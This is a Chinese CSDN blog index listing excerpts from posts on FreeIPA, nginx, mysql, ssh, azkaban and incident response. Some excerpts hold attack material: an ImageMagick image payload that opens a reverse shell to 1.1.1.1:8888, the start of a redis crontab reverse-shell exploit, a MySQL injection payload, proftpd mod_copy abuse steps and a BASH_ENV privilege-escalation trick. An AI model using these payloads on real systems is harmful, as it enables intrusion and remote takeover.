HRay's blog

私信 关注
hrayha
码龄9年
  • 215,240
    被访问量
  • 55
    原创文章
  • 42,253
    作者排名
  • 36
    粉丝数量
  • 于 2011-11-10 加入CSDN
获得成就
  • 获得25次点赞
  • 内容获得19次评论
  • 获得45次收藏
荣誉勋章
TA的专栏
  • 风控
    1篇
  • 开源风控系统
  • 企业安全建设
    1篇
  • python
    1篇
  • mysql
    4篇
  • freeipa
    8篇
  • ssl
    2篇
  • 安全漏洞
    3篇
  • 安全
    18篇
  • linux
    14篇
  • ssh
    2篇
  • 运维
    13篇
  • ossec
    1篇
  • 最近
  • 文章
  • 资源
  • 问答
  • 课程
  • 帖子
  • 收藏
  • 关注/订阅

推荐一个在线画图网站

https://www.processon.com/一直在用,还不错,大家如果有更好的也可以评论说下
原创
139阅读
0评论
0点赞
发布博客于 3 月前

jumpserver批量执行命令报Error occur: SoftTimeLimitExceeded解决方法

参考https://github.com/jumpserver/jumpserver/issues/3813修改/opt/jumpserver/apps/ops/tasks.py文件,找到@shared_task(soft_time_limit=60, queue="ansible")def run_command_execution(cid, **kwargs): ......这部分,修改soft_time_limit后面的值,单位是s...
原创
337阅读
0评论
0点赞
发布博客于 7 月前

开源风控系统radar部署

简介radar是一款2019年发版的开源风控系统。项目官网http://radar.pgmmer.top目前在码云上(https://gitee.com/freshday/radar)有1.2k的stargithub上(https://github.com/wfh45678/radar )有500+的star起因目前已经发布到1.04版,官方的部署文档https://gitee.com/freshday/radar/wikis/manual?sort_id=163744...
原创
441阅读
0评论
0点赞
发布博客于 8 月前

【转载】一个人的安全部系列

注:一个人的安全部主要问题在于人力资源的不足,甚至当只有一个人力预算的情况下,安全预算可能严重不足的,但是该有的东西还是不能少,只是实现上偏简单粗暴一些,转两篇文章记录一下,作者写的很详细,方便自己查漏补缺一个人的安全部之企业信息安全建设规划一个人的安全部之大话企业数据安全保护...
转载
151阅读
0评论
0点赞
发布博客于 9 月前

【转载】FreeIPA中间CA证书已过期

转载自https://www.kutu66.com//hulianwang/article_188064问题:我们有2个FreeIPA服务器在网络中运行,今天我们发现:https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020中间CA已过期,我们无法连接到LDAP。日志中有以下错误:ipa: INFO: 401 Unauthorized: [
转载
580阅读
0评论
0点赞
发布博客于 9 月前

grafana权限管理

注:企业中往往有各种各样的应用系统,对于安全来说只要可能涉及到敏感数据的系统都要了解权限管理,这篇文章介绍grafana的权限管理比较详细,所以转一下,访问可能需要梯子https://medium.com/@maiccaejfeng/grafana-user-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86%E4%BB%A5%E5%8F%8A-dashboard-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86-d5c5
转载
510阅读
0评论
0点赞
发布博客于 9 月前

【转载】绕过ssl pining使用burp抓包微信小程序

参考了https://xz.aliyun.com/t/6102不过文章里是用的windows,我是用的mac模拟器因为Genymotion是付费的,所以我选择了网易mumu,关于网易mumu如何使用adb连接以及配置代理可参考http://mumu.163.com/help/func/20190129/30131_797867.htmlmac安装adb 参考https://www.jianshu.com/p/69ba21b2996c安装frida的话直接执行pip install fr.
转载
606阅读
0评论
0点赞
发布博客于 10 月前

Nginx编译安装lua-nginx-module

注:转载自https://www.cnblogs.com/52fhy/p/10164553.htmllua-nginx-module模块可以将Lua的强大功能嵌入NGINX服务器。下载Nginx源码如果已安装Nginx,需要查看当前安装版本的编译参数:$ /usr/local/nginx/sbin/nginx -V nginx version: nginx/1.12.2 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) built .
转载
209阅读
0评论
0点赞
发布博客于 10 月前

【转载】敏感词过滤实现-DFA

前段时间需要搞一个基于敏感词过滤的脚本,最早搞过一个遍历关键词的,普通的用一下还行,像敏感词词库动不动上万的词库,这样效率太多了,网上搜了一下,找到这么一篇文章python实现敏感词过滤的几种方法最后选用了里面的DFA算法,这里记录一下...
转载
325阅读
0评论
0点赞
发布博客于 10 月前

hive开启ranger鉴权后set报错的解决方案(阿里云)

阿里云emr集群hive开启ranger后执行set时报错“java.lang.IllegalArgumentException: Cannot modify mapred.job.queue.name at runtime. It is not in list of params that are allowed to be modified at runtime”网上搜这个报错搜到华为云的一篇文章https://support.huaweicloud.com/trouble-mrs/mrs_03
原创
565阅读
0评论
0点赞
发布博客于 1 年前

ranger对接ldap过程中遇到的一个坑

修改usersync的install.properties文件后,执行setup.shsetup.py文件存在一个bug,会修改hadoop-conf/core-site.xml文件权限及属主,导致服务不可用。(详见http://issues.apache.org/jira/browse/RANGER-2671)解决方法也比较简单:执行setup.sh前先将{usersync}/...
原创
320阅读
0评论
0点赞
发布博客于 1 年前

freeipa证书相关的一些命令

ipa-getcert list #查看全部证书ipa-cacert-manage renew #更新证书ipa-getcert resubmit -i cert_nickname #cert_nickname自行替换,可由ipa-getcert list 命令获取到,结合自带的certmonger服务可以更新证书过期时间最后吐槽下freeipa的证书是个大坑,默认CA是...
原创
574阅读
2评论
0点赞
发布博客于 1 年前

freeipa一次启动失败的解决

重启机器后freeipa启动失败执行ipactl start发现连接389端口time out但是对应的ldap服务是开机启动的,服务状态也正常,看了下389是监听在ipv6的,看起来是默认配置不支持ipv6导致于是执行以下命令sysctl net.ipv6.conf.all.disable_ipv6=0sysctl net.ipv6.conf.lo.disable_ipv6=...
原创
246阅读
0评论
0点赞
发布博客于 1 年前

对某大型企业的一次web漏洞挖掘过程

前段时间利用周末时间对某大厂做了一次web安全检测,已经很久没搞,但是自己近几年没有脱离业务,并且对业务的理解有进一步的加深,反而可以挖到按以前的思路可能挖不到的漏洞,所以将大概的思考过程记录下来,因为是有稿费的,所以这里只贴上链接吧对某大型企业的一次web漏洞挖掘过程...
原创
305阅读
0评论
0点赞
发布博客于 1 年前

kerberos常见错误及解决方法

oracle总结的还是比较全面的https://docs.oracle.com/cd/E26926_01/html/E25889/trouble-2.html
原创
686阅读
0评论
0点赞
发布博客于 1 年前

渗透中寻找突破口的那些事

注:之前发在乌云drops的一篇文章,汇总了自己对渗透测试中寻找突破口的一些总结,现在乌云drops没有了,所以发在自己blog上。一、寻找目标在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目标,只需要检测一些常见的高危漏洞即可有收获常用思路1.网段信息1)通过子域名如果存在域传送这种...
原创
827阅读
1评论
0点赞
发布博客于 1 年前

hue连mysql查询条件包含中文时报错'latin-1' codec can't encode

这个问题找了好久,开始按网上的一些做法尝试在hue.ini中添加options={"init_command":"set names utf8;SET CHARACTER SET utf8;SET character_set_connection=utf8;"}但是重启hue后仍然没效果,最后搜到了一篇文章https://blog.csdn.net/supperman_009/artic...
原创
133阅读
0评论
0点赞
发布博客于 1 年前

系统中多个python版本通过pip安装方法

python2.7 -m pip install xxx #python2.7替换为需要pip安装的版本
原创
1716阅读
1评论
5点赞
发布博客于 2 年前

使用reptyr在screen中接管执行中进程

reptyr下载地址https://www.ostechnix.com/reptyr-move-running-process-new-terminal/当你开启了一个占用很长时间的进程,比如wget一个大文件,但是没有在screen等这种环境里打开,又不想占着一个窗口一直等待或者担心ssh中断导致进程退出,就可以使用reptyr了,使用方法也很简单,开启一个screen,在screen中执行...
原创
934阅读
0评论
1点赞
发布博客于 2 年前

ssh配置免密登录失败的几种情况

1.最常见的,权限问题,.ssh目前权限要为700,authorized_keys权限要6002.部分操作系统里新创建的用户默认是锁定的,这种情况下认证失败在/var/log/secure中会看到如下错误Nov 21 11:04:26 host-xxxxx sshd[14011]: User test not allowed because account is lockedNov 21...
原创
5663阅读
0评论
0点赞
发布博客于 3 年前

【转】azkaban的部署过程中遇到的一些坑(部署篇)

转载自  https://my.oschina.net/u/2988360/blog/1537561注:azkaban之前有个配置文件默认要求6G以上可用内存的坑,解决完之后今天又遇到了代码写死3G以上内存的坑,根据报错信息正巧搜到了这篇文章,另外作者的主页https://my.oschina.net/u/2988360里也有其他几篇关于azkaban的文章,推荐1.azkaban源码下载...
转载
819阅读
0评论
0点赞
发布博客于 3 年前

【转】redis利用姿势收集

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;测试环境:CentOS,RHEL# 利用crontab反弹shellredis-cli flushall echo -e "

*/1 * * * * /bin/bash -i >& /...
转载
318阅读
0评论
0点赞
发布博客于 3 年前

imagemaick的ghostscript RCE漏洞修复

漏洞信息可以参考imagemaick的ghost script RCE漏洞目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml在<policymap>标签中增加如下内容 <policy domain="co...
原创
511阅读
0评论
0点赞
发布博客于 3 年前

chrome另存为图片无响应解决方法

只要另存为图片浏览器就卡死,尝试重装chrome,清除缓存等仍然无效,最后参考http://tieba.baidu.com/p/2403437252先切换为系统自带的输入法在另存为图片,果然可以了,贴吧里面说的原因是“输入法的状态栏与chrome浏览器的另存为窗口冲突 可能是大家都在抢显示在最前面 ”,设置下输入法状态栏,改成嵌入式的,不用切换也好了,这里记录下...
原创
9483阅读
1评论
0点赞
发布博客于 3 年前

mysql中执行show full processlist命令条数过多显示不全问题的解决

其实很简单,show full processlist或者show processlist的结果都是从information_schema.processlist表取的结果,直接去查这个表就行了,还可以用sql按条件查询,更方便展示...
原创
4753阅读
0评论
1点赞
发布博客于 3 年前

推荐一个在线时序图网站

https://www.websequencediagrams.com/支持文字语法直接生成时序图比如自带的示例:title Authentication SequenceAlice->Bob: Authentication Requestnote right of Bob: Bob thinks about itBob->Alice: Authentication Response生...
原创
7579阅读
1评论
2点赞
发布博客于 3 年前

ossec集成自定义脚本

在使用ossec之前我们这边零零散散的写了几个安全功能的脚本,放在机器上要一直监控进程是不是存在,使用ossec后,可以通过在客户端的ossec.conf中增加如下内容 full_command /usr/bin/python xxx.py 10 其中frequency可以指定执行间隔时间,这里我设置的是10秒执行一次
原创
760阅读
0评论
0点赞
发布博客于 4 年前

auditd配置num_logs不生效解决方法

配置auditd的num_logs值为5,但是发现并不生效,初始配置大概是这样log_file = /xxx/xxx.loglog_format = RAWlog_group = rootpriority_boost = 4flush = INCREMENTALfreq = 20num_logs = 5disp_qos = lossydispatcher = /sbin/aud
原创
537阅读
0评论
0点赞
发布博客于 4 年前

ossec启动报ossec-remoted(1206): ERROR: Unable to Bind port错误解决方法

今天部署ossec,启动时ossec-remoted一直都无法启动,日志出现如下错误2017/10/20 16:43:53 ossec-remoted: INFO: Started (pid: 2699).2017/10/20 16:43:53 getaddrinfo: Name or service not known2017/10/20 16:43:53 ossec-remoted(1
原创
1597阅读
0评论
0点赞
发布博客于 4 年前

ssh连接失败自动重连脚本

一个简单的小脚本,有些任务需要ssh连接,如果失败的话可以自动不断重连直至成功#!/bin/bashwhile [ 0 -eq 0 ]do ssh $@ if [ $? -eq 0 ]; then break; else sleep 2 fidone使用也比较简单,保存为ssh.sh 执行sh ssh.sh user@
原创
2084阅读
0评论
0点赞
发布博客于 4 年前

azkaban任务延迟执行问题跟进

结论:在azkaban配置时如果filter有MinimumFreeMemory,会选择可用内存大于6GB的executor去执行任务,如所有的executor可用内存都不足6GB时则会分配executor失败,导致任务无法执行,一直到内存重新回到大于6GB分配executor成功,任务才会执行。分析过程:第一次出现问题是在8月4号,当时看了下日志,发现如下内容[ExecutorM
原创
5000阅读
3评论
3点赞
发布博客于 4 年前

又一篇azkaban源码分析

转载至http://www.ivanopt.com/deep-research-source-code-azkaban/本篇文章研究azkaban 调度器以下几个问题:1. Executor 和 Web Server 是如何交互的。2. Executor 的扩展是如何实现的。3. Executor 是如何执行即时任务的。我们从用户提交工作流作为入口,研究一下azka
转载
2477阅读
0评论
0点赞
发布博客于 4 年前

【转载】Azkaban源码分析

转载自http://www.acyouzi.com/2017/06/15/azkaban/简介因为 azkaban 功能比较简单,所以在实际使用中存在一些需求用对 azkaban 进行定制,比如:跨 Flow 依赖在 job 执行失败时短信报警Flow 的 start node 可能需要检测满足一定条件再触发(时间,数据是否就绪)可能需要设置 job 优先级,在集群
转载
3168阅读
0评论
0点赞
发布博客于 4 年前

当自动化安装遇到ncurse界面的解决方法(取消交互的通用方法)

要实现某个程序的自动化安装,但是在apt-get的时候就会遇到ncurse界面的交互在这里纠结了一会,最后在https://serverfault.com/questions/227190/how-do-i-ask-apt-get-to-skip-any-interactive-post-install-configuration-steps 找到了解决方案,执行DEBIAN_FR
原创
347阅读
0评论
0点赞
发布博客于 4 年前

安全应急方法-发现后门文件

主要指非web类后门,web类后门可参考一中的4及后面部分       1)记录文件stat信息,备份文件并删除       2)通过netstat -anltp命令可查看到当前连接信息及建立连接的进程pid,kill掉可疑连接的进程,且已知进程pid可以执行ls -al /proc/pid值 通过exe对应位置找到后门文件路径       3)通过ps aux命令检查是否存在其他可疑
原创
3040阅读
0评论
0点赞
发布博客于 4 年前

安全应急方法-站点页面被篡改

把自己工作中积累的一些经验写出来,希望对大家有帮助 1)找到被篡改页面,stat文件记录更改时间及用户等信息 2)将被篡改页面拷贝至其他非web目录,恢复正常页面 3)查看页面被篡改时间的accesslog,找出后门文件及操作ip(可能有多个ip访问后门,需要全部记录,重点记录第一个访问ip) 4)stat后门文件记录时间及操作用户等...
原创
2768阅读
1评论
0点赞
发布博客于 4 年前

nginx多条件判断

今天一个运维群里有人发了个需求“在nginx怎么拒绝这样的连接1 请求的目标是 / 请求的方法是 POST2 $http_user_agent  是Mozilla/5.0”我给出的方法如下:set $flag 0;if ($http_user_agent = Mozilla/5\.0\.) { set $flag "${flag}1";}location =
原创
1512阅读
0评论
0点赞
发布博客于 4 年前

centos安装freeipa

https://www.globo.tech/learning-center/install-freeipa-centos-7/   文章说的是centos7,不过亲测centos6.6可安装,缺点是版本比较低,3.0.0的版本,有个证书两年到期的坑,证书到期的话可参考http://www.freeipa.org/page/IPA_2x_Certificate_Renewal
转载
2248阅读
0评论
1点赞
发布博客于 4 年前

linux根据uid反查用户名

auditd的日志只记录用户uid而不会显示对应用户名,看起来不是很友好,于是需要根据uid反查出用户名,但是有些用户是在ldap上的,因此也不能通过/etc/passwd来查,咨询了一下全栈工程师root,给了一条命令getent passwd uid查了一下果然可以,这里记录下,比如查询uid为33的用户名执行getent passwd 33返回如下结果www-data
原创
9657阅读
0评论
0点赞
发布博客于 5 年前

linux不用符号实现写文件

今天群里dark牛提出了一个场景,linux下不使用重定向或管道符如何实现写文件,机器不能外联,排除了wget -O  curl -o等方法,非交互环境,排除了vim直接写文件,他当时想了一个写到log里然后mv的思路,但是有不少噪音,算不上完美,后来小伟哥提出一个用nohup实现的方法,这里记录一下dark牛也提出了一个先用dd创建一个非空文件然后sed替换的思路
原创
657阅读
0评论
0点赞
发布博客于 5 年前

https站点调用百度地图api

一般加载百度地图api的地址为http://api.map.baidu.com/api?v=2.0&ak=ZUO**************AbM这种,里面的涉及的其他资源url也都全部写死为http了,这样导致的问题就是完全没法用,看了下相关文档,找到这个页面http://lbsyun.baidu.com/index.php?title=jspopular/guide/introduction#
原创
15069阅读
0评论
0点赞
发布博客于 5 年前

记录两个使用http2.0遇到的坑

因为苹果明年元旦开始要求苹果商店里的app使用连接必须都为https,因此最近在搞一些https+http2.0相关的调研,一开始就碰到两个小问题,这里记录下1.下载了新版nginx,修改了配置启用http2.0,但是发现无论如何都还是http1.1,后来看了https://iyaozhen.com/nginx-http2-conf.html 这篇文章,照着里面说的编译nginx的时候带了上新
原创
4427阅读
0评论
2点赞
发布博客于 5 年前

企业级集中身份认证及授权管理实践freeipa

注:转载自http://blog.csdn.net/xuyaqun/article/details/51596018 关于freeipa写的很全面,推荐一、背景 随着公司服务器、服务、用户越来越多,以前单机用户管理、单机sudo授权的方式已不是发展的要求,故需要做企业级的集中身份认证授权管理(比如:ldap、kerberos、ca、dns、sudo、密码策略),原因有三: 1、
转载
6543阅读
0评论
2点赞
发布博客于 5 年前

supervisor设置环境变量

今天在机器上配置supervisor守护flume进程的时候发现无法启动,报错是找不到JAVA_HOME,即使在flume_env.sh中配置了JAVA_HOME的路径也不行,后来网上搜了一下,supervisor在program的配置文件中有个environment配置,比如我的这个需求,在配置文件最下面增加environment=JAVA_HOME="xxxxxx"即可,如果多个环境变量用逗号
原创
16863阅读
0评论
2点赞
发布博客于 5 年前

ufw常用命令记录

ufw default allow     #默认允许全部访问,如果希望仅白名单访问就把allow改成deny,切记改成deny后别急着开启ufw,否则啥都连不进来了。。ufw allow from 192.168.1.1 to any port 8888           #允许192.168.1.1访问8888端口 ufw deny 8888                
原创
4792阅读
0评论
0点赞
发布博客于 5 年前

ImageMagick漏洞(cve-2016-3714)利用及修复

利用:如下内容保存为图片格式上传即可(命令部分自行替换)push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context修复(php):上传时先利用getimage
原创
4794阅读
3评论
1点赞
发布博客于 5 年前

运维日志排查常用shell

转载至:https://github.com/yaseng/pentest/blob/master/note/audit-log.md前言记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。常用命令查找关键词并统计行数cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l
转载
863阅读
0评论
0点赞
发布博客于 5 年前

ssh卡在debug1: SSH2_MSG_KEXINIT sent解决方法

现象:主机间互通正常且可以判断对方ssh端口是开放的,但是用ssh xxx.xxx.xxx.xxx -v这种方式连接的时候会卡在debug1: SSH2_MSG_KEXINIT sent这步解决方法:echo "1454" > /sys/class/net/eth0/mtu原因:详情参考http://techbackground.blogspot.com/2013/06/path-mtu-
原创
10957阅读
0评论
0点赞
发布博客于 5 年前

Linux下grep显示前后几行信息

转自http://www.cnblogs.com/mfryf/p/3336288.htmlgrep -C 5 foo file 显示file文件里匹配foo字串那行以及上下5行grep -B 5 foo file 显示foo及前5行grep -A 5 foo file 显示foo及后5行
转载
737阅读
0评论
0点赞
发布博客于 5 年前

劫持事件处理中针对gzip压缩数据包的处理

现在各种运营商的劫持都比较猖獗,可能不少小伙伴都处理过劫持事件,一般的处理过程可参考http://security.tencent.com/index.php/blog/msg/10与http://security.tencent.com/index.php/blog/msg/81 抓包的方法这里提一下,打开一般都是手机连接wifi,电脑上设置代理,但是有些劫持发生在3g、4g这种,给大家提供
原创
2051阅读
0评论
0点赞
发布博客于 5 年前

freeipa热备配置过程

注:参考了http://my.oschina.net/u/142602/blog/186481 先在原ipaserver上执行如下命令 kinit adminipa-replica-prepare ipa2.xxx.comscp /var/lib/ipa/replica-info-ipa2.xxx.com.gpg root@ipa2.xxx.com:/root在热备主机上...
原创
2510阅读
0评论
0点赞
发布博客于 5 年前

redhat使用163的yum源

注:redhat系统设置163yum源过程,今天捣鼓了下,网上很多文章上记录的东西已经404了,记录下,方便自己也方便大家因为需要卸载系统自带的yum,此处先把后面装yum的一些包下载下来wget http://mirrors.163.com/centos/6.7/os/x86_64/Packages/yum-3.2.29-69.el6.centos.noarch.rpmwget htt
原创
2757阅读
0评论
0点赞
发布博客于 5 年前

常见弱点端口扫描(限速)

./nmap -sT -sV -p 21,80,443,873,2601,2604,3128,4440,6082,6379,8000,8008,8080,8081,8090,8099,8088,8888,9000,9090,9200,11211,27017,28017 --max-hostgroup 10 --max-parallelism 10 --max-rtt-timeout 1000ms
原创
1630阅读
0评论
0点赞
发布博客于 6 年前

cmd下传文件方法记录

注:以前写在百度空间的,转过来某个web的命令执行,windows主机,不像linux下可以通过wget下个文件很方便,开始尝试echo个vbs下载,如果直接在cmd下是没问题的,但是web端执行发现只要有逗号就连同后面的内容一起没了,后来又尝试一个转码脚本,反正试了半天最后还是没成功,网上找了找,发现了ftp这个方法,记录一下,本地先搭建一个ftp,假设用户名密码为admin/adm
原创
1326阅读
0评论
0点赞
发布博客于 6 年前

mysql通过存储过程实现aes加解密

前言:数据库难免会存一些敏感数据,密码可以用不可逆算法,但是有些东西本来就需要可逆,比如用户银行卡号、身份证号、手机号等,mysql自身提供了AES_ENCRYPT、AES_DECRYPT来实现aes的加解密,但是利用格式为AES_ENCRYPT('需要加密的字符','加解密用的key'),如果在代码层直接调用的话就会导致把key写的到处都是,那肯定不是大家想要的效果,于是这里自己搞了个存储过程,
原创
3573阅读
0评论
0点赞
发布博客于 6 年前

linux中对文件名包含空格时处理异常的解决方法

linux对文件批量操作时,比如如下命令(命令仅仅是举个例子,实际情况应该大多不会用cat):for i in `locate *.php|grep '/www/'`;do cat $i;done当文件名包含空格时,加入文件名为aaa bbb传入cat的时候会当成aaa与bbb两个文件,所以结果自然是提示找不到文件这种情况只要把$i替换成$(echo $i|sed 's/ /\
原创
1104阅读
0评论
0点赞
发布博客于 6 年前

记一次更换域名ip遇到的坑

公司某个域名功能变更,迁移到了新的机器上,原域名test.aaa.com对应ip1.1.1.1当时直接把ip改成了2.2.2.2但是忽略了该域名还配了泛解析,指向cname为test.aaa.com,我这么一改,导致有几个test.aaa.com下的三级域名解析异常,幸好没造成太大的影响记录一下,提醒自己及大家,域名更改ip的时候注意此坑
原创
1717阅读
0评论
0点赞
发布博客于 6 年前

ssl证书双向认证失效的一种解决方案

ssl证书双向认证配置可参考http://blog.csdn.net/hrayha/article/details/46446653某天突然发现证书认证失效了,所有人访问都校验失败,提示400错误,服务器各项服务都正常,异常的这段时间也没进行过什么操作,起初怀疑nginx的问题,重启了一下,问题依旧,是否为客户端传递证书信息的时候失败了呢,抓包看了下也正常,纠结了一会,同事给出了一个线索,执行
原创
3451阅读
0评论
0点赞
发布博客于 6 年前

windows系统tomcat降权遇到的小问题及解决方法

前期主要就是创建一个新的guest用户并赋予java及tomcat目录的权限,不了解的同学可以参考http://www.poluoluo.com/server/201301/192791.html  win2008操作也基本一样出问题的地方主要是后期以tomcat用户启动,这里我想到的方式是runas,于是执行runas /user:tomcat "D:\apache-tomcat\bin
原创
1450阅读
0评论
0点赞
发布博客于 6 年前

mysql注入-orderby之后limit位置

今天遇到的,记录下,如下位置产生sql注入select xxx from x order by xx limit {sql}花括号位置为可控的点,支持报错的话可以利用如下语句获取内容http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23不支持报
原创
2223阅读
0评论
0点赞
发布博客于 6 年前

用户crontab不执行的解决方法

留作备忘,执行某个sh文件,crontab -e写到了当前用户下,无法执行,脚本直接执行运行正常,写到/etc/crontab下运行正常,尝试将路径改为绝对路径发现依然不行,排除了文件路径问题与权限问题,后来百度了一下,发现http://www.cnblogs.com/wxjnew/p/3490736.html 这篇文章试了下里面提到的方法,在sh文件前加上#!/bin/bashif [
原创
4209阅读
0评论
0点赞
发布博客于 6 年前

一个linux的提权技巧

注:这篇文章最早在xiaoyu的百度空间看到过,今天又在51cto看到了,顺手转过来,属于一种较通用的提权方法,转自http://www.51cto.com/art/200907/139210.htm一个linux提权用的技巧,放出来攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_EN
转载
2442阅读
2评论
0点赞
发布博客于 6 年前

proftpd的mod_copy模块未授权调用利用记录

文章来源自《安全参考》第30期,略有改动影响版本:proftpd-1.3.4---proftpd-1.3.51.执行命令nc x.x.x.x 212.执行site cpfr /etc/passwd可以未授权状态复制文件3.执行site cpto /tmp/test可将之前复制的/etc/passwd粘贴到/tmp/test高级用法:s
转载
983阅读
0评论
0点赞
发布博客于 6 年前

出现set_locale() failed (5): Input/output error的解决方法

字符集的问题,执行locale -a结果如下xxx@xxxx:~$ locale -aCC.UTF-8en_US.utf8POSIX发现没有中文的,于是执行sudo /usr/share/locales/install-language-pack zh_CN问题解决
原创
1597阅读
0评论
0点赞
发布博客于 6 年前

freeipa执行命令出现出现(ipa: ERROR: did not receive Kerberos credentials)的解决方法

执行ipa user-xxx这种命令都会出现ipa: ERROR: did not receive Kerberos credentials的错误 解决方法,先执行kinit username(username换成你自己的用户名) 然后解锁用户的话再执行ipa user-unlock username即可
原创
2052阅读
0评论
1点赞
发布博客于 6 年前

ssl双向认证部署+如何吊销证书

欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦:Markdown和扩展Markdown简洁的语法代码块高亮图片链接和图片上传LaTex数学公式UML序列图和流程图离线写博客导入导出Markdown文件丰富的快捷键快捷键加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
原创
4755阅读
1评论
1点赞
发布博客于 6 年前

freeipa安装客户端后密码不正确解决方法

某台主机安装freeipa客户端后发现从其他主机连过来无法直接传递ticket,仍然需要输入密码,并且输入密码提示不正确,开始以为是kerberos的问题,但是本机执行kinit user正常,说明与kerberos通信正常,那sssd出现问题的可能性就比较大了,打开了sssd的log(参考http://blog.csdn.net/hrayha/article/details/45895925),
原创
1803阅读
0评论
0点赞
发布博客于 6 年前

mysql更改datadir后无法启动解决

备注:今天同事更改mysql的datadir后直接重启mysql导致无法启动,网上查了下,执行mysql_install_db --user=mysql --basedir=/usr --datadir=/data/mysql后发现仍然存在问题,后来在网上搜到这篇文章解决了问题,记录下,转载自http://www.518z.com/seo/linuxxilie/linuxjiaocheng/201
转载
10486阅读
3评论
3点赞
发布博客于 6 年前

sssd配置log

今天sssd出了点问题导致freeipa账户登不上了,重启sssd恢复正常,但是发现这货默认不记日志,所以记下https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Deployment_Guide/SSSD-Troubleshooting.html
原创
1868阅读
0评论
0点赞
发布博客于 6 年前

分享两条nginx安全配置

nginx安全配置
原创
510阅读
0评论
0点赞
发布博客于 6 年前

mysql执行update提示ERROR 1205 (HY000): Lock wait timeout exceeded; try restarting transaction的应急解决方法

mysql执行update提示ERROR 1205 (HY000): Lock wait timeout exceeded; try restarting transaction的应急解决方法
原创
2770阅读
0评论
0点赞
发布博客于 6 年前

改用csdn博客

用了近7年的百度空间关闭了,以后改用csdn博客,后续原创文章会迁过来一部分
原创
416阅读
0评论
0点赞
发布博客于 6 年前